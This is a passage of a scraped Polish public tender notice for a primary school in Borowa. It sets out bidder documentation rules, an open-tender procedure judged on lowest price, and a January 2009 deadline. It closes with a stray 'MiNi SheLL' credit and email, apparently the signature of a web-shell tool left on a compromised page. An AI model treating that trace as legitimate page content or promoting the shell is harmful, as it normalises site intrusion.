d)	Ponadto należy dołączyć do oferty dla każdego z członków konsorcjum z osobny załącznik nr 2, oraz oświadczenie każdego z członków konsorcjum o ich odpowiedzialności solidarnej za zobowiązania.

UWAGA: Do podmiotów wspólnie ubiegających się o zamówienie publiczne stosuje się te same przepisy co do pojedynczego Wykonawcy. Odpowiednie ich stosowanie oznacza, że każdy uczestnik wspólnej oferty musi udokumentować, iż posiada uprawnienia do wykonywania określonej działalności lub czynności i nie podlega wykluczeniu z postępowania. Natomiast przy ocenie spełniania warunków, brany jest pod uwagę łączny potencjał techniczny i kadrowy wykonawców (członków konsorcjum) ich łączne kwalifikacje i doświadczenie oraz łączną sytuację ekonomiczną i finansową.

B
8.6.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że: 
a)	nie otwarto jego likwidacji;
b)	nie ogłoszono upadłości;
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.

Wyżej wymienione dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert.
Jeśli w kraju pochodzenia osoby lub w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej oraz w pkt. 8.6, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
W przypadku załączenia do oferty dokumentów sporządzonych w obcym języku, Wykonawcy zobowiązani są załączyć tłumaczenia tekstów na język polski. Tłumaczenie musi być poświadczone przez Wykonawcę. 

W przypadku złożenia oferty, bądź też dokonania innych czynności przez osobę lub osoby nie uwidocznione w odpisie z KRS- u dla spółek prawa handlowego, bądź nie będącą właścicielem firmy w przypadku innej formy prawnej, należy dołączyć prawnie skuteczne pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów.

Dokumenty, o których mowa w punkcie 8.2 i 8.3 mogą być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentów wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwość co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spborowa.yoyo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa w Borowej
 ul. Parkowa 2/4
55-095 Mirków.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2009 godzina 10:00, miejsce: Szkoła Podstawowa w Borowej
 ul.Parkowa 2/4
 55-095 Mirków.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com